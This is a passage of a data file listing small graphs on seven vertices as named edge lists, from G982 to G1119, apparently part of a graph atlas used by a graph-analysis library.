[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G982',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G983',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 2],
[3, 5],
[6, 3],
[1, 6],
[5, 4],
[7, 6],
[7, 5],
[4, 6]]],
['edgelist',
'G984',
7,
[[1, 3],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G985',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G986',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G987',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[6, 7]]],
['edgelist',
'G988',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G989',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[6, 4],
[5, 6],
[7, 5]]],
['edgelist',
'G990',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G991',
7,
[[1, 2],
[1, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G992',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[6, 4],
[7, 5],
[2, 4]]],
['edgelist',
'G993',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G994',
7,
[[3, 4],
[5, 3],
[6, 3],
[5, 2],
[7, 1],
[4, 1],
[4, 2],
[7, 4],
[6, 7],
[2, 6],
[5, 1],
[4, 5]]],
['edgelist',
'G995',
7,
[[3, 4],
[5, 3],
[5, 2],
[3, 6],
[7, 1],
[7, 5],
[4, 2],
[7, 4],
[1, 4],
[2, 6],
[5, 1],
[6, 4]]],
['edgelist',
'G996',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 7],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G997',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[2, 4],
[7, 5],
[6, 5]]],
['edgelist',
'G998',
7,
[[7, 4],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[1, 7],
[5, 2],
[4, 5],
[7, 6],
[6, 2],
[1, 5]]],
['edgelist',
'G999',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 5],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G1000',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1001',
7,
[[1, 4],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1002',
7,
[[1, 5],
[4, 1],
[2, 4],
[5, 2],
[2, 1],
[5, 6],
[3, 5],
[7, 3],
[6, 7],
[3, 6],
[4, 3],
[7, 4]]],
['edgelist',
'G1003',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[6, 3],
[6, 5],
[7, 5],
[7, 4],
[7, 3],
[6, 4]]],
['edgelist',
'G1004',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7]]],
['edgelist',
'G1005',
7,
[[4, 1],
[5, 3],
[4, 2],
[5, 1],
[6, 3],
[6, 2],
[5, 4],
[6, 5],
[4, 6],
[7, 2],
[1, 7],
[3, 7]]],
['edgelist',
'G1006',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[7, 6],
[2, 7],
[4, 5],
[6, 4],
[3, 4],
[6, 3],
[7, 4],
[3, 7]]],
['edgelist',
'G1007',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4]]],
['edgelist',
'G1008',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4],
[7, 5],
[7, 6]]],
['edgelist',
'G1009',
7,
[[4, 7],
[2, 3],
[1, 7],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 2],
[3, 6],
[5, 6],
[7, 5]]],
['edgelist',
'G1010',
7,
[[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1011',
7,
[[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1012',
7,
[[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1013',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4],
[1, 3],
[7, 5]]],
['edgelist',
'G1014',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5],
[2, 7]]],
['edgelist',
'G1015',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1016',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1017',
7,
[[1, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1018',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1019',
7,
[[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1020',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1021',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[5, 6],
[2, 7]]],
['edgelist',
'G1022',
7,
[[1, 2],
[2, 3],
[3, 4],
[5, 6],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 4],
[5, 4],
[1, 3],
[6, 7]]],
['edgelist',
'G1023',
7,
[[1, 6],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1024',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1025',
7,
[[6, 7],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[3, 2]]],
['edgelist',
'G1026',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 7]]],
['edgelist',
'G1027',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 1],
[4, 7],
[6, 4],
[5, 6]]],
['edgelist',
'G1028',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 1],
[4, 7],
[6, 4],
[1, 6]]],
['edgelist',
'G1029',
7,
[[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[7, 5],
[1, 7],
[6, 1],
[4, 6]]],
['edgelist',
'G1030',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1031',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[5, 7]]],
['edgelist',
'G1032',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 2],
[7, 6],
[2, 7]]],
['edgelist',
'G1033',
7,
[[1, 5],
[1, 7],
[2, 4],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1034',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1035',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1036',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 4],
[7, 6],
[5, 7]]],
['edgelist',
'G1037',
7,
[[1, 6],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1038',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[7, 6],
[6, 2]]],
['edgelist',
'G1039',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[6, 5],
[1, 6],
[7, 1],
[4, 7],
[7, 5]]],
['edgelist',
'G1040',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[7, 2],
[6, 2],
[3, 7]]],
['edgelist',
'G1041',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[6, 7]]],
['edgelist',
'G1042',
7,
[[2, 1],
[3, 2],
[5, 3],
[2, 5],
[4, 2],
[1, 4],
[3, 4],
[6, 3],
[2, 6],
[1, 6],
[7, 1],
[2, 7],
[3, 7]]],
['edgelist',
'G1043',
7,
[[3, 6],
[7, 3],
[6, 7],
[5, 6],
[4, 5],
[1, 4],
[5, 1],
[2, 5],
[4, 2],
[7, 4],
[3, 2],
[5, 3],
[4, 3]]],
['edgelist',
'G1044',
7,
[[1, 4],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1045',
7,
[[3, 5],
[4, 3],
[2, 4],
[5, 2],
[1, 5],
[4, 1],
[7, 4],
[2, 7],
[6, 2],
[5, 6],
[7, 5],
[4, 6],
[2, 3]]],
['edgelist',
'G1046',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[4, 6],
[4, 7]]],
['edgelist',
'G1047',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 6],
[6, 7]]],
['edgelist',
'G1048',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G1049',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[4, 5],
[4, 6]]],
['edgelist',
'G1050',
7,
[[1, 3],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1051',
7,
[[3, 6],
[2, 3],
[6, 2],
[5, 6],
[4, 5],
[1, 4],
[5, 1],
[4, 3],
[5, 3],
[2, 4],
[7, 4],
[3, 7],
[2, 7]]],
['edgelist',
'G1052',
7,
[[1, 5],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1053',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[1, 5],
[7, 2],
[5, 7]]],
['edgelist',
'G1054',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[6, 1],
[7, 6],
[2, 7],
[5, 1]]],
['edgelist',
'G1055',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[2, 4],
[4, 3],
[5, 1],
[3, 6],
[4, 5],
[6, 4],
[1, 6],
[7, 5],
[7, 2]]],
['edgelist',
'G1056',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[7, 3],
[6, 7],
[1, 6],
[2, 3]]],
['edgelist',
'G1057',
7,
[[6, 5],
[7, 3],
[7, 5],
[5, 4],
[6, 1],
[4, 2],
[4, 3],
[7, 4],
[6, 7],
[5, 1],
[2, 5],
[6, 2],
[1, 4]]],
['edgelist',
'G1058',
7,
[[1, 3],
[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1059',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[1, 2],
[3, 1],
[4, 3],
[7, 6],
[7, 5]]],
['edgelist',
'G1060',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[6, 4],
[3, 6],
[2, 1],
[5, 2],
[1, 5],
[1, 7],
[5, 7]]],
['edgelist',
'G1061',
7,
[[1, 5],
[4, 1],
[3, 4],
[5, 3],
[2, 5],
[4, 2],
[2, 1],
[6, 1],
[5, 6],
[2, 6],
[7, 2],
[1, 7],
[4, 7]]],
['edgelist',
'G1062',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1063',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1],
[7, 4],
[5, 7],
[6, 2]]],
['edgelist',
'G1064',
7,
[[6, 3],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[7, 3],
[7, 4],
[2, 3],
[4, 2],
[5, 1]]],
['edgelist',
'G1065',
7,
[[2, 1],
[3, 2],
[1, 3],
[1, 4],
[4, 3],
[7, 3],
[2, 7],
[6, 2],
[7, 6],
[5, 7],
[6, 5],
[1, 6],
[5, 1]]],
['edgelist',
'G1066',
7,
[[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1067',
7,
[[1, 6],
[1, 7],
[2, 4],
[2, 5],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1068',
7,
[[1, 2],
[2, 3],
[5, 2],
[4, 2],
[1, 5],
[3, 4],
[1, 4],
[3, 1],
[6, 1],
[7, 6],
[5, 7],
[4, 6],
[5, 3]]],
['edgelist',
'G1069',
7,
[[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1070',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[1, 5],
[3, 4],
[7, 6],
[1, 7]]],
['edgelist',
'G1071',
7,
[[6, 3],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[7, 3],
[7, 4],
[3, 4],
[6, 1],
[5, 1]]],
['edgelist',
'G1072',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[7, 4],
[7, 5],
[5, 3],
[1, 4]]],
['edgelist',
'G1073',
7,
[[1, 2],
[1, 7],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1074',
7,
[[1, 2],
[1, 7],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1075',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 3],
[1, 7],
[6, 1],
[3, 6],
[6, 4],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G1076',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 6],
[1, 7],
[1, 3],
[3, 6],
[6, 4],
[5, 6],
[7, 5],
[4, 7]]],
['edgelist',
'G1077',
7,
[[4, 5],
[1, 4],
[5, 1],
[4, 7],
[4, 2],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[6, 3],
[4, 6],
[7, 3],
[6, 7]]],
['edgelist',
'G1078',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5],
[7, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1079',
7,
[[2, 1],
[3, 2],
[7, 1],
[2, 5],
[4, 2],
[1, 4],
[3, 4],
[2, 7],
[2, 6],
[3, 7],
[5, 4],
[6, 5],
[7, 6]]],
['edgelist',
'G1080',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 6],
[3, 7],
[4, 6],
[5, 7]]],
['edgelist',
'G1081',
7,
[[1, 7],
[2, 3],
[3, 4],
[1, 4],
[5, 3],
[6, 1],
[7, 4],
[5, 2],
[4, 5],
[7, 6],
[2, 6],
[4, 6],
[2, 4]]],
['edgelist',
'G1082',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[7, 5],
[5, 4],
[6, 5],
[6, 3],
[7, 1],
[4, 7],
[4, 6]]],
['edgelist',
'G1083',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 7],
[1, 5],
[7, 6],
[1, 7],
[7, 5],
[3, 6],
[6, 4],
[5, 6],
[2, 6],
[7, 2]]],
['edgelist',
'G1084',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1085',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1086',
7,
[[3, 4],
[6, 3],
[7, 6],
[4, 7],
[5, 4],
[6, 5],
[1, 6],
[3, 1],
[2, 3],
[1, 2],
[6, 2],
[5, 3],
[7, 5]]],
['edgelist',
'G1087',
7,
[[3, 2],
[1, 6],
[7, 1],
[5, 7],
[6, 5],
[2, 6],
[7, 2],
[4, 7],
[6, 4],
[3, 6],
[7, 3],
[2, 1],
[4, 5]]],
['edgelist',
'G1088',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[7, 1]]],
['edgelist',
'G1089',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 6],
[2, 7],
[3, 4],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1090',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[5, 7],
[6, 2],
[5, 6],
[4, 2],
[6, 3],
[7, 1],
[7, 2],
[3, 2],
[5, 2]]],
['edgelist',
'G1091',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 4],
[6, 5],
[6, 3],
[6, 2],
[7, 6],
[2, 7],
[3, 7]]],
['edgelist',
'G1092',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7]]],
['edgelist',
'G1093',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 2],
[6, 3],
[7, 2],
[7, 1],
[4, 7],
[2, 4],
[7, 5],
[6, 5],
[6, 4]]],
['edgelist',
'G1094',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 6],
[3, 4],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1095',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 4],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[4, 5],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1096',
7,
[[1, 3],
[1, 6],
[1, 7],
[2, 3],
[2, 5],
[2, 7],
[3, 4],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1097',
7,
[[4, 5],
[6, 1],
[4, 6],
[1, 7],
[7, 5],
[3, 4],
[5, 3],
[2, 1],
[3, 2],
[2, 7],
[6, 2],
[3, 6],
[7, 3]]],
['edgelist',
'G1098',
7,
[[1, 3],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1099',
7,
[[4, 1],
[3, 4],
[5, 3],
[1, 5],
[6, 4],
[6, 3],
[6, 5],
[2, 4],
[2, 1],
[5, 2],
[7, 1],
[4, 7],
[2, 7]]],
['edgelist',
'G1100',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[7, 1],
[2, 7],
[7, 4],
[5, 7],
[2, 3],
[6, 1]]],
['edgelist',
'G1101',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 4],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G1102',
7,
[[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6]]],
['edgelist',
'G1103',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[6, 4],
[6, 5],
[7, 5],
[7, 3],
[7, 6],
[6, 3],
[4, 7]]],
['edgelist',
'G1104',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 7],
[5, 6],
[6, 7]]],
['edgelist',
'G1105',
7,
[[1, 2],
[1, 6],
[1, 7],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 6],
[4, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G1106',
7,
[[1, 2],
[3, 1],
[3, 4],
[4, 5],
[1, 5],
[1, 6],
[7, 2],
[5, 7],
[7, 6],
[3, 7],
[4, 2],
[6, 4],
[3, 2]]],
['edgelist',
'G1107',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[6, 3],
[2, 6],
[2, 5],
[2, 4],
[3, 1],
[5, 1],
[6, 4]]],
['edgelist',
'G1108',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[3, 4],
[1, 5],
[2, 7]]],
['edgelist',
'G1109',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1110',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 7],
[6, 7]]],
['edgelist',
'G1111',
7,
[[1, 7],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[3, 4],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1112',
7,
[[1, 4],
[2, 3],
[2, 5],
[2, 6],
[2, 7],
[3, 5],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[4, 7],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1113',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[4, 7],
[6, 4],
[5, 6],
[7, 5]]],
['edgelist',
'G1114',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[7, 3],
[2, 7],
[6, 2],
[1, 6]]],
['edgelist',
'G1115',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[2, 3],
[2, 4],
[2, 5],
[3, 4],
[3, 5],
[4, 5],
[6, 3],
[4, 6],
[7, 5],
[1, 7]]],
['edgelist',
'G1116',
7,
[[4, 5],
[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[3, 5],
[6, 2],
[1, 4],
[2, 5],
[1, 2],
[1, 5],
[7, 5],
[1, 7]]],
['edgelist',
'G1117',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[2, 6],
[2, 7],
[4, 5],
[4, 6],
[5, 7]]],
['edgelist',
'G1118',
7,
[[1, 2],
[1, 3],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 7],
[3, 6],
[3, 7],
[4, 5],
[4, 6],
[5, 6],
[5, 7],
[6, 7]]],
['edgelist',
'G1119',
7,
[[1, 2],
[1, 3],
